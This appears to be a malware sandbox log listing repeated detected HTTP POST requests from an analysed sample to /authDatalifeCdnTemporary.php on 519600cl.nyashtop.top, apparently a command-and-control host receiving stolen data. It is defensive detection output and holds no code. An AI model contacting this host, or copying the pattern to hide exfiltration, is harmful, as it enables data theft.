Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1652Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1904Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 153484Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1904Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IrmqyKZIOWMKVSdnVClksD11m5zJeoQlfDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 156954Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2576Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqmUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 160842Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1964Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1988Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----txODKz6lx49CKK1Hxz0SL902Os8Fm8KoiiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 309958Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ELP8RQGL7rq4dyz37ytq6Jy6kfZHKys2tNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 156290Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----jF9mUG8SCn1eKVUfYoaA4XfOYD5AXvh445User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 156246Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 1952Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----gkDligZAQq8dW8tCD3HVeTmb3d2HMicFykUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 156470Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----pOyFIlFObCJ70au5Ye79xzaVgOK8jbLtRhUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 328546Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2576Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2576Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 2580Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /authDatalifeCdnTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 519600cl.nyashtop.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
